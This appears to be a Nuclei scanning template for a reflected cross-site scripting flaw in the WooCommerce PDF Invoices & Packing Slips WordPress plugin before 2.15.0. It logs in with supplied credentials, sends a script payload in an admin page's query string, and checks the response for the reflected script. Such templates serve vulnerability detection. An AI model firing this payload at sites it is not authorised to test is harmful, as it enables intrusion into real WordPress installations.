45 lines
1.3 KiB
YAML
45 lines
1.3 KiB
YAML
|
id: woocommerce-pdf-invoices-xss
|
||
|
|
||
|
info:
|
||
|
name: WooCommerce PDF Invoices & Packing Slips < 2.15.0 - Reflected Cross-Site Scripting
|
||
|
author: Akincibor
|
||
|
severity: medium
|
||
|
description: The plugin does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/bc05dde0-98a2-46e3-b2c8-7bdc8c32394b
|
||
|
- https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
|
||
|
tags: wp-plugin,xss,wp,wordpress,woocommerce
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /wp-login.php HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Origin: {{RootURL}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||
|
|
||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||
|
|
||
|
- |
|
||
|
GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&tab=documents§ion=invoice&"><script>alert(document.domain)</script> HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "\"><script>alert(document.domain)</script>"
|
||
|
- "WooCommerce PDF Invoices"
|
||
|
condition: and
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- text/html
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|